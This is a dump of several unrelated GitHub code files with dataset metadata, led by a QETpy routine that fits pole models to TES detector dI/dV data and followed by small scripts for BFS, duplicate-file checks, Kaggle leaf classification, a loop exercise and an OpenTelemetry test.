yerr=None, A0=0.25, B0=-0.6, C0=-0.6,\n tau10=-1.0/(2*np.pi*5e2), tau20=1.0/(2*np.pi*1e5), tau30=0.0,\n dt=-10.0e-6, poles=2, isloopgainsub1=None,\n bounds=None, lgcfix=None, verbose=0, max_nfev=1000,\n method='trf', loss='linear',\n ftol=1e-15, xtol=1e-15):\n \"\"\"\n Function to find the fit parameters for either the 1-pole\n (A, tau2, dt), 2-pole (A, B, tau1, tau2, dt), or 3-pole\n (A, B, C, tau1, tau2, tau3, dt) fit.\n\n \"\"\"\n\n if (poles==1):\n # assume the square wave is not inverted\n p0 = np.array((A0, tau20, dt), dtype=float)\n bounds1=bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf)),\n )\n # assume the square wave is inverted\n p02 = np.array((-A0, tau20, dt), dtype=float)\n bounds2=bounds\n if bounds is None:\n bounds2 = (\n np.array((-np.inf, 0.0, -np.inf)),\n np.array((0.0, np.inf, np.inf)),\n )\n elif (poles==2):\n # assume loop gain > 1, where B<0 and tauI<0\n p0 = np.array((A0, B0, tau10, tau20, dt),\n dtype=float)\n bounds1 = bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, -np.inf, -np.inf, 0.0, -np.inf)),\n np.array((np.inf, 0.0, 0.0, np.inf, np.inf)),\n )\n \n # assume loop gain < 1, where B>0 and tauI>0\n p02 = np.array((A0, -B0, -tau10, tau20, dt),\n dtype=float)\n bounds2 = bounds\n if bounds is None:\n bounds2 = (\n np.array((0.0, 0.0, 0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf, np.inf, np.inf)),\n )\n \n \n elif (poles==3):\n # assume loop gain > 1, where B<0 and tauI<0\n p0 = np.array((A0, B0, C0, tau10, tau20, tau30, dt),\n dtype=float)\n bounds1 = bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, -np.inf, -np.inf, -np.inf, 0.0, 0.0, -np.inf)),\n np.array((np.inf, 0.0, 0.0, 0.0, np.inf, np.inf, np.inf)),\n )\n # assume loop gain < 1, where B>0 and tauI>0\n p02 = np.array((A0, -B0, -C0, -tau10, tau20, tau30, dt),\n dtype=float)\n bounds2 = bounds\n if bounds is None:\n bounds2 = (\n np.array((0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.inf)),\n )\n\n\n fix_params = None\n if lgcfix is not None:\n\n fix_params = p0[lgcfix].copy()\n \n p0 = p0[~lgcfix]\n bounds1 = (bounds1[0][~lgcfix],\n bounds1[1][~lgcfix])\n \n p02 = p02[~lgcfix]\n bounds2 = 
(bounds2[0][~lgcfix],\n bounds2[1][~lgcfix])\n\n \n\n \n def _residual_calc(params):\n \"\"\"\n Define a residual for the nonlinear least squares\n algorithm. Different functions for different amounts of\n poles.\n\n \"\"\"\n if (poles==1):\n A, tau2, dt = params\n ci = DIDV._onepoleadmittance(\n freq, A, tau2,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n\n elif(poles==2):\n A, B, tau1, tau2, dt = params\n ci = DIDV._twopoleadmittance(\n freq, A, B, tau1, tau2,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n \n elif(poles==3):\n A, B, C, tau1, tau2, tau3, dt = params\n ci = DIDV._threepoleadmittance(\n freq, A, B, C, tau1, tau2, tau3,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n\n # the difference between the data and the fit\n diff = didv - ci\n # get the weights from yerr, these should be\n # 1/(standard deviation) for real and imaginary parts\n if (yerr is None):\n weights = 1.0+1.0j\n else:\n weights = 1.0/yerr.real+1.0j/yerr.imag\n # create the residual vector, splitting up real and imaginary\n # parts of the residual separately\n z1d = np.zeros(freq.size*2, dtype=np.float64)\n z1d[0:z1d.size:2] = diff.real*weights.real\n z1d[1:z1d.size:2] = diff.imag*weights.imag\n return z1d\n\n\n def _residual(var_params):\n \"\"\"\n Function that is passed to nonlinear \n least_squares scipy algorithm\n \n Parameters\n ----------\n\n var_params : np.array (dtype=float)\n variable fit parameters array\n\n \n Return\n ------\n\n residual : np.array\n \"\"\"\n\n if fix_params is None:\n return _residual_calc(var_params)\n else:\n all_params = np.zeros_like(lgcfix, dtype=float)\n np.place(all_params, lgcfix, fix_params)\n np.place(all_params, ~lgcfix, var_params)\n return _residual_calc(all_params)\n\n \n\n if (isloopgainsub1 is None):\n # res1 assumes loop gain > 1, where B<0 and tauI<0\n res1 = least_squares(\n _residual,\n p0,\n bounds=bounds1,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n # res2 assumes loop gain < 1, where B>0 and tauI>0\n res2 = least_squares(\n _residual,\n p02,\n bounds=bounds2,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n # check which loop gain cases gave the better fit\n if (res1['cost'] < res2['cost']):\n res = res1\n else:\n res = res2\n elif isloopgainsub1:\n # assume loop gain < 1, where B>0 and tauI>0\n res = least_squares(\n _residual,\n p02,\n bounds=bounds2,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n else:\n #assume loop gain > 1, where B<0 and tauI<0\n res = least_squares(\n _residual,\n p0,\n bounds=bounds1,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n\n\n # variables\n popt = res['x'].copy()\n if lgcfix is not None:\n popt = np.zeros_like(lgcfix, dtype=float)\n np.place(popt, lgcfix, fix_params)\n np.place(popt, ~lgcfix, res['x'])\n \n # cost\n cost = res['cost']\n\n\n # check if the fit failed (usually only happens when we reach maximum\n # evaluations, likely when fitting assuming the wrong loop gain)\n if not res['success'] :\n print(f\"{poles}-Pole Fit Failed: \" + res['message'])\n\n # take matrix product of transpose of jac and jac, take the inverse\n # to get the analytic covariance matrix\n pcovinv = np.dot(res[\"jac\"].transpose(), res[\"jac\"])\n pcov = np.linalg.pinv(pcovinv)\n\n return popt, pcov, cost\n\n\n def dofit(self, poles, fcutoff=np.inf,\n bounds=None, 
guess_params=None,\n guess_isloopgainsub1=None,\n biasparams_dict=None,\n lgcfix=None, lgc_ssp_light=False,\n verbose=0, max_nfev=1000,\n method='trf', loss='linear',\n ftol=1e-15, xtol=1e-15):\n \"\"\"\n This method does the fit that is specified by the variable\n poles. If the `processtraces` method has not been run yet, then\n this method will run that first.\n\n Parameters\n ----------\n poles : int\n The fit that should be run. Should be 1, 2, or 3.\n fcutoff : float, optional\n The cutoff frequency in Hz, above which data is ignored in\n the specified fitting routine. Default is `np.inf`, which\n is equivalent to no cutoff frequency.\n bounds: \n lgc_ssp_light : bool, optional\n Used to tell dofit that the smallsignalparams light (only\n beta, l, L, tau0, gratio) result dictionary including\n uncertainties and covaraiance matrix should be calculted\n\n Raises\n ------\n ValueError\n If the inputted `poles` is not 1, 2, or 3.\n\n Notes\n -----\n Depending on the fit, there are three possible models to be\n used with different parameterizations:\n\n 1-pole model\n - has the form:\n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n\n 2-pole model\n - has the form:\n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n + B / (1.0 + 2.0j * pi * freq * tau1)\n\n 3-pole model\n - note the placement of the parentheses in the last term of\n this model, such that pole related to `C` is in the\n denominator of the `B` term\n - has the form: \n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n + B / (1.0 + 2.0j * pi * freq * tau1\n - C / (1.0 + 2.0j * pi * freq * tau3))\n\n \"\"\"\n\n if self._tmean is None:\n self.processtraces()\n\n fit_freqs = np.abs(self._freq) < fcutoff\n\n\n \n # 1-Pole fit\n if poles==1:\n \n # guess the 1 pole square wave parameters\n A0_1pole, tau20_1pole = DIDV._squarewaveguessparams(\n self._tmean,\n self._sgamp,\n self._rsh,\n )\n \n # time shift guess\n dt = self._dt0\n \n # overrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 3:\n raise ValueError(\n 'Expecting 2 guessed parameters. '\n + 'Found ' + str(len(guess_params)))\n inA0, intau20, indt = guess_params\n if inA0 is not None:\n A0_1pole = inA0\n if intau20 is not None:\n tau20_1pole = intau20\n if indt is not None:\n dt = indt\n\n \n # 1 pole fitting\n fitparams1, fitcov1, fitcost1 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0_1pole,\n tau20=tau20_1pole,\n dt=dt,\n poles=poles,\n isloopgainsub1=False,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n # Convert to didv falltimes\n falltimes1 = DIDV._findpolefalltimes(fitparams1)\n\n self._1poleresult = DIDV._fitresult(\n poles,\n fitparams1,\n fitcov1,\n falltimes1,\n fitcost1,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err, \n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n\n elif poles==2:\n \n \n # Guess the starting parameters for 2 pole fitting\n A0, B0, tau10, tau20, isloopgainsub1 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )\n\n # time shift\n dt0 = self._dt0\n \n\n # overrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 5:\n raise ValueError(\n 'Expecting 5 guessed parameters. 
'\n + 'Found ' + str(len(guess_params)))\n inA0, inB0, intau10, intau20, indt = guess_params\n if inA0 is not None:\n A0 = inA0\n if inB0 is not None:\n B0 = inB0\n if intau10 is not None:\n tau10 = intau10\n if intau20 is not None:\n tau20 = intau20\n if indt is not None:\n dt0 = indt\n\n\n # loopgainsub1 \n if guess_isloopgainsub1 is not None:\n isloopgainsub1 = guess_isloopgainsub1\n \n \n\n # 2 pole fitting\n fitparams2, fitcov2, fitcost2 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0,\n B0=B0,\n tau10=tau10,\n tau20=tau20,\n dt=dt0,\n poles=poles,\n isloopgainsub1=isloopgainsub1,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n \n # Convert to didv falltimes\n falltimes2 = DIDV._findpolefalltimes(fitparams2)\n\n self._2poleresult = DIDV._fitresult(\n poles,\n fitparams2,\n fitcov2,\n falltimes2,\n fitcost2,\n self._rsh,\n self._rp,\n self._r0,\n self._offset, \n self._offset_err, \n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n\n elif poles==3:\n \n if self._2poleresult is None:\n # Guess the 3-pole fit starting parameters from\n # 2-pole fit guess\n A0, B0, tau10, tau20 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )[:-1]\n B0 = -abs(B0)\n C0 = -0.05\n tau10 = -abs(tau10)\n tau30 = 1.0e-3\n dt0 = self._dt0\n \n else:\n A0 = self._2poleresult['params']['A']\n B0 = -abs(self._2poleresult['params']['B'])\n C0 = -0.05\n tau10 = -abs(self._2poleresult['params']['tau1']) \n tau20 = self._2poleresult['params']['tau2']\n tau30 = 1.0e-3\n dt0 = self._2poleresult['params']['dt']\n\n\n # is loop gain < 1\n isloopgainsub1 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )[-1]\n\n \n # overwrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 7:\n raise ValueError(\n 'Expecting 7 guessed parameters. 
'\n + 'Found ' + str(len(guess_params)))\n inA0, inB0, inC0, intau10, intau20, intau30, indt = guess_params\n if inA0 is not None:\n A0 = inA0\n if inB0 is not None:\n B0 = inB0\n if inC0 is not None:\n C0 = inC0\n if intau10 is not None:\n tau10 = intau10\n if intau20 is not None:\n tau20 = intau20\n if intau30 is not None:\n tau30 = intau30 \n if indt is not None:\n dt0 = indt\n\n\n # loopgainsub1 \n if guess_isloopgainsub1 is not None:\n isloopgainsub1 = guess_isloopgainsub1\n\n\n \n # 3 pole fitting\n fitparams3, fitcov3, fitcost3 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0,\n B0=B0,\n C0=C0,\n tau10=tau10,\n tau20=tau20,\n tau30=tau30,\n dt=dt0,\n poles=poles,\n isloopgainsub1=isloopgainsub1,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n # Convert to didv falltimes\n falltimes3 = DIDV._findpolefalltimes(fitparams3)\n\n self._3poleresult = DIDV._fitresult(\n poles,\n fitparams3,\n fitcov3,\n falltimes3,\n fitcost3,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err,\n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n \n if lgc_ssp_light:\n ssp_light_cov = get_smallsignalparams_cov(self._3poleresult)\n ssp_light_sigmas = get_smallsignalparams_sigmas(self._3poleresult)\n \n self._3poleresult = DIDV._fitresult(\n poles,\n fitparams3,\n fitcov3,\n falltimes3,\n fitcost3,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err,\n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n ssp_light_cov=ssp_light_cov,\n ssp_light_sigmas=ssp_light_sigmas,\n )\n \n\n else:\n raise ValueError(\"The number of poles should be 1, 2, or 3.\")\n\n def dofit_with_true_current(self, offset_dict, output_offset, closed_loop_norm, output_gain,\n ibias_metadata,\n bounds=None, guess=None,\n inf_loop_gain_approx=False, inf_loop_gain_limit=False, \n lgcdiagnostics=False):\n \"\"\"\n Given the offset dictionary used to store the various current\n current offsets used to reconstruct the true current through the \n TES and the trace metadata, finds the true current through the TES,\n makes a biasparams dict, and recalculates the smallsignalparams\n from the newly found true bias point.\n \n \n Parameters:\n ----------\n \n offset_dict: dict\n Where are the relevant offsets are stored. Generated from the IV\n sweep.\n \n output_offset: float, volts\n The output offset gotten from the event metadata. In units of volts,\n we correct for volts to amps conversion with the closed loop norm.\n \n closed_loop_norm: float, volts/amp=ohms\n The constant from the metadata used to translate the voltage measured by\n the DAQ into a current coming into the input coil of the SQUIDs. In units of\n volts/amp = ohms.\n \n output_gain: float, dimensionless\n The dimensionless gain used to convert the output offset in volts to the \n equivilant offset voltage measured by the DAQ\n \n ibias_metadata: float\n The ibias gotten from the event metadata, i.e. without correcting for\n the ibias offset calculated from the IV curve\n \n bounds: array, optional\n Passed to dofit.\n \n guess: array, optional\n Passed to dofit\n \n inf_loop_gain_approx : bool, optional\n Defaults to False. If True, calculates the biasparameters and the\n rest of the fits using the infinite loop gain approximation.\n \n inf_loop_gain_limit : bool, optional\n Defaults to False. 
If True, calculates the biasparameters and the\n rest of the fits using the infinite loop gain approximation only if\n the fit loopgain is negative.\n \n Returns:\n --------\n \n result3: fitresult_dict\n 3 pole fit result with biasparams calculated, and the smallsignalparams\n correctly calculated from the r0 calculated for the biasparams\n \n \"\"\"\n\n self._rp = offset_dict['rp']\n\n rsh = self._rsh\n rp = self._rp\n\n offset = self._offset\n offset_err = self._offset_err\n\n i0, i0_err = get_i0(offset, offset_err, offset_dict, output_offset,\n closed_loop_norm, output_gain, lgcdiagnostics)\n ibias, ibias_err = get_ibias(ibias_metadata, offset_dict, lgcdiagnostics)\n biasparams_dict = get_tes_bias_parameters_dict(i0, i0_err, ibias, ibias_err, rsh, rp)\n \n if inf_loop_gain_approx:\n biasparams_dict = get_tes_bias_parameters_dict_infinite_loop_gain(self._3poleresult['params'], self._3poleresult['cov'], i0, i0_err, ibias, ibias_err, rsh, rp)\n \n self._r0 = biasparams_dict['r0']\n\n result3 = self.dofit(3, bounds=bounds, guess_params=guess, biasparams_dict=biasparams_dict,\n lgc_ssp_light = True)\n \n if inf_loop_gain_limit:\n if self._3poleresult['smallsignalparams']['l'] < 0:\n biasparams_dict = get_tes_bias_parameters_dict_infinite_loop_gain(self._3poleresult['params'], \n self._3poleresult['cov'], i0, \n i0_err, ibias, ibias_err, \n rsh, rp)\n result3 = self.dofit(3, bounds=bounds, guess_params=guess, biasparams_dict=biasparams_dict,\n lgc_ssp_light = True)\n \n return result3\n\n @staticmethod\n def _fitresult(poles, params, cov, falltimes, cost, rsh, rp, r0,\n offset, offset_err, \n biasparams_dict=None, lgcfix=None,\n ssp_light_cov=None, ssp_light_sigmas=None):\n \"\"\"\n Function for converting data from different fit results to a\n results dictionary.\n\n \"\"\"\n\n result = dict()\n result['lgcfix'] = lgcfix\n\n # errors\n errors = np.diag(cov)**0.5\n if lgcfix is not None:\n errors = np.zeros_like(lgcfix, dtype=float)\n np.place(errors, lgcfix, 0.0)\n np.place(errors, ~lgcfix, np.diag(cov)**0.5)\n \n if poles == 1:\n result['params'] = {\n 'A': params[0],\n 'tau2': params[1],\n 'dt': params[2],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'tau2': errors[1],\n 'dt': errors[2],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'L': smallsignalparams[2],\n 'dt': smallsignalparams[3],\n }\n\n if poles == 2:\n result['params'] = {\n 'A': params[0],\n 'B': params[1],\n 'tau1': params[2],\n 'tau2': params[3],\n 'dt': params[4],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'B': errors[1],\n 'tau1': errors[2],\n 'tau2': errors[3],\n 'dt': errors[4],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'r0': smallsignalparams[2],\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'dt': smallsignalparams[7],\n }\n\n if poles == 3:\n result['params'] = {\n 'A': params[0],\n 'B': params[1],\n 'C': params[2],\n 'tau1': params[3],\n 'tau2': params[4],\n 'tau3': params[5],\n 'dt': params[6],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'B': errors[1],\n 'C': errors[2],\n 'tau1': errors[3],\n 'tau2': errors[4],\n 'tau3': errors[5],\n 'dt': errors[6],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, 
rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'r0': smallsignalparams[2],\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'gratio': smallsignalparams[7],\n 'tau3': smallsignalparams[8],\n 'dt': smallsignalparams[9],\n }\n \n #we only calculate the smallsignalparameters covaraiance matrix for\n #these parameters, so this is just a container for them\n if (ssp_light_cov is not None) and (ssp_light_sigmas is not None):\n ssp_light_vals = {\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'gratio': smallsignalparams[7],\n }\n result['ssp_light'] = {\n 'vals': ssp_light_vals,\n 'cov': ssp_light_cov,\n 'sigmas': ssp_light_sigmas,\n }\n\n result['offset'] = offset\n result['offset_err'] = offset_err\n \n if biasparams_dict is not None:\n result['biasparams'] = biasparams_dict\n \n result['falltimes'] = falltimes\n result['cost'] = cost\n result['didv0'] = complexadmittance(0, **result['smallsignalparams']).real\n\n return result\n","repo_name":"spice-herald/QETpy","sub_path":"qetpy/core/didv/_didv.py","file_name":"_didv.py","file_ext":"py","file_size_in_byte":36481,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"16783164253","text":"from collections import deque\n\n\ndef bfs(a):\n q = deque()\n q.append([a, 1])\n visit[a] = 1\n while q:\n v = q.popleft()\n for i in [v[0]*2, v[0]*10 + 1]:\n if i < b+1:\n if i not in visit.keys():\n q.append([i, v[1]+1])\n visit[i] = 1\n if i == b:\n return v[1] + 1\n\n return -1\n\n\na, b = map(int, input().split())\nvisit = dict()\nprint(bfs(a))\n","repo_name":"yyytae0/algorithm-training","sub_path":"baekjoon/16953.py","file_name":"16953.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25722426995","text":"check = '//192.168.133.14/shenzhen_rsycn/adas_parsing_data_1911_b/check'\nrepeat = 'C:/Users/Gigabyte/Desktop/adas_parsing_data_0409_to0410'\nfrom pathlib import Path\n\n# c=Path(check)\n# p=Path(repeat)\n# check_dirs = [i for i in c.iterdir() if i.is_dir]\n# repeat_dirs = [i for i in p.iterdir() if i.is_dir]\n\nimg_paths = [i for i in Path(repeat).rglob('*.jpg')]\njson_paths = [i for i in Path(repeat).rglob('*.json')]\n# images = c.rglob('*.jpg')\n# print(len(jpgs) + len(jsons))\nimport cv2\n\n# img_names = []\n# for img_path in img_paths:\n# img_name = img_path.name\n# img_names.append(img_name)\n# \n# for idx, img_name in enumerate(img_names):\n# # print(img_name)\n# if img_names.count(img_name) > 1:\n# print(img_paths[idx])\n \njson_names = []\nfor json_path in json_paths:\n json_name = json_path.name\n json_names.append(json_name)\n\nrepeat_json_names=set()\nfor idx, json_name in enumerate(json_names):\n # repeat_json_path_group_tmp = []\n if json_names.count(json_name) > 1:\n repeat_json_names.add(json_name)\n\n\n\n\nfor repeat_json_name in repeat_json_names:\n json_paths_this_name_in_check = [str(i) for i in Path(check).rglob(repeat_json_name)]\n print(json_paths_this_name_in_check)\n\n# # repeat_json_path_group_tmp = []\n# if json_names.count(json_name) > 1:\n# repeat_json_names.add(json_name)\n\n\n# import shutil\n#\n# for repeat_json_name in repeat_json_names:\n# repeat_json_paths_this_name = [i for i in Path(repeat).rglob(repeat_json_name)]\n# # 
print(repeat_json_paths_this_name)\n# with open(str(file-tools), 'r') as f:\n# dict = json.load(f)\n# image_name = dict['imagePath']\n# if '.jpg'in image_name:\n# shutil.copy(str(file-tools), new_path)\n# else:\n# continue\n\n# print(repeat_json_names)\n# img_paths = [i for i in Path(repeat).rglob('*.jpg')]\n# json_paths = [i for i in Path(repeat).rglob('*.json')]\n\n# img_names = []\n# for img_path in imgs:\n# img_name = img_path.name\n# img_names.append(img_name)\n#\n# for img_name in img_names:\n# # print(img_name)\n# if img_names.count(img_name) > 1:\n# print(img_name)\n\nimport os\n\n# for root, dirs, files in os.walk(repeat):\n# if os.path.isfile(fname)\n# # for rqcodeFile in files:\n# print(str(files))\n\n# print(check_dirs)\n# from pathlib import Path\n# import shutil\n# import cv2\n# # root = '192.168.133.14/ai_lab/gaoxiang/dataset/train_dataset/adas_parsing_data_0409_to0410/'\n# json_paths = []\n# image_paths = []\n#\n# file-tools = open(\"./repeat_log.txt\", 'r', encoding='utf-8')\n# for line in file-tools.readlines():\n#\n# # check_file_path = root + line\n# # check_file_path = str(check_file_path)\n# # check_file_path = repr(check_file_path)\n# # line = line.replace(\"\\\\\", \"/\")\n# # line = 'line\n# # check_file_path = str(check_file_path)\n# line = eval(line)\n# # check_file_path.strip('\\n')\n#\n# # print(line)\n#\n# if line[:-1] == 'g':\n# print(line)\n# # json_paths.append(check_file_path)\n# # suffix = check_file_path[-5:]\n# # if suffix == 'json':\n# # print(suffix)\n# # img = cv2.imread(check_file_path)\n# # cv2.imshow(\"s\", img)\n# # cv2.waitKey()\n# # image_paths.append(check_file_path)\n#\n# # print(check_file_path)\n#\n# # line=str(line)\n# # line = line.strip('adas_parsing_data_0409_to0410')\n# # print(line)\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# # dst_path_images = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\images'\n# # dst_path_jsons = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\jsons'\n# # dst_path_repeats = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\repeats'\n# #\n# # src_dirs = [i for i in Path(src_path).iterdir() if i.is_dir]\n# # processed_file_names = []\n# #\n# #\n# # def process_files(processed_file_names, files):\n# # for file-tools in files:\n# # file_name = file-tools.name\n# # file_suffix = file-tools.suffix\n# # processed_file_names.append(file_name)\n# # if file_name in processed_file_names:\n# # shutil.copy(str(file-tools), dst_path_repeats)\n# # else:\n# # if file_suffix == '.json':\n# # shutil.copy(str(file-tools), dst_path_jsons)\n# # elif file_suffix == '.jpg':\n# # shutil.copy(str(file-tools), dst_path_images)\n# # return processed_file_names\n# #\n# #\n# # for _dir in src_dirs:\n# # sub_dirs = [i for i in Path(str(_dir)).iterdir() if i.is_dir()]\n# #\n# # sub_sub_dirs = [i for i in Path(str(sub_dirs)).iterdir() if i.is_dir()]\n# # for dir_tmp in sub_sub_dirs:\n#\n# #\n# # if len(sub_dirs) == 0:\n# # files1 = [i for i in Path(str(_dir)).iterdir() if i.is_file()]\n# # processed_file_names = process_files(processed_file_names, files1)\n# #\n# # elif len(sub_dirs) > 0:\n# # sub_sub_dirs = [i for i in Path(str(sub_dirs)).iterdir() if i.is_dir()]\n# # for dir_tmp in sub_sub_dirs:\n# # files2 = [i for i in Path(str(dir_tmp)).iterdir() if i.is_file()]\n# # processed_file_names = process_files(processed_file_names, 
files2)\n#\n#\n","repo_name":"thinkinchaos/Tools","sub_path":"Datasets/labelme/check_4_15.py","file_name":"check_4_15.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2469327245","text":"import time\nimport statistics\nimport collections\nimport numpy\nfrom IPython.display import display, FileLinks\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport pandas as pd\n\nstart = time.time()\n\ntrain = pd.read_csv('../input/train.csv')\nx = train.drop(['id', 'species'], axis=1).values\nle = LabelEncoder().fit(train['species'].values)\nscaler = StandardScaler().fit(x)\nx = scaler.transform(x)\ny = le.transform(train['species'])\n\nc = LogisticRegression(C=3000)#, multi_class='multinomial', solver='sag')\n\naccs = []\nlosses = []\nsss = StratifiedShuffleSplit(n_splits=2, test_size=0.2, random_state=23)\nfor train_index, test_index in sss.split(x, y):\n c.fit(x[train_index], y[train_index])\n acc = accuracy_score(y[test_index], c.predict(x[test_index]))\n loss = log_loss(y[test_index], c.predict_proba(x[test_index]))\n display('{} {}'.format(acc, loss))\n accs.append(acc)\n losses.append(loss)\n\ndisplay('---')\ndisplay('{} {}'.format(statistics.mean(accs), statistics.mean(losses)))\ndisplay('it took {}s'.format(time.time() - start))\n\n\nc = c.fit(x, y)\n\ntest = pd.read_csv('../input/test.csv')\ntest_ids = test.pop('id')\nx_test = test.values\nx_test = scaler.transform(x_test)\n\ny_test = c.predict_proba(x_test)\npd.DataFrame(y_test, index=test_ids, columns=le.classes_).to_csv('result.csv')\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/leaf-classification/logits/leaf-playground.py","file_name":"leaf-playground.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"7197246975","text":"# Generar numeros de 1 a 200, sumarlos hasta obtener 100\n\n# print('Generar n numeros para obtener una ganancia ')\n# ganar = int(input('Cuanto quieres ganar ? '))\n# c = 0\n# suma = 0\n# while suma < ganar:\n# c += 1\n# suma += c\n# print('Suma = ',suma)\n# print(f'Use {c} nuemeros')\n\n\nprint('Generar n numeros para obtener una ganancia ')\nganar = int(input('Cuanto quieres ganar ? 
'))\nc = 0\nsuma = 0\nwhile c < 500:\n c += 1\n suma += c\n print(c, end=' ')\n if suma >= ganar:\n print('\\n')\n break\n\nprint('Suma > ', suma)","repo_name":"castruaz/compapl-2022","sub_path":"p32-numeros-1a200-suma100.py","file_name":"p32-numeros-1a200-suma100.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10888559182","text":"from os import environ\nfrom flask import Flask, Request\nfrom mock import patch\n\nenviron[\"COLLECTOR_ENDPOINT\"] = \"jaeger\"\n\nimport main\n\nclass StubRequest():\n\n def __init__(self, headers):\n self.headers = headers\n\n@patch('main.logger')\ndef test_chorus(mock_logger):\n app = Flask(__name__)\n with app.app_context():\n request = StubRequest({'traceparent': '00-0000000000000000000000000000000f-000000000000000a-00'})\n response = main.entry_point(request)\n assert response.status_code == 200\n assert mock_logger.mock_calls[-1][0] == 'info'","repo_name":"peckhamdata/open-telemetry-gcp-demo","sub_path":"cloud_functions/chorus/test/test_chorus.py","file_name":"test_chorus.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3449340041","text":"from json import 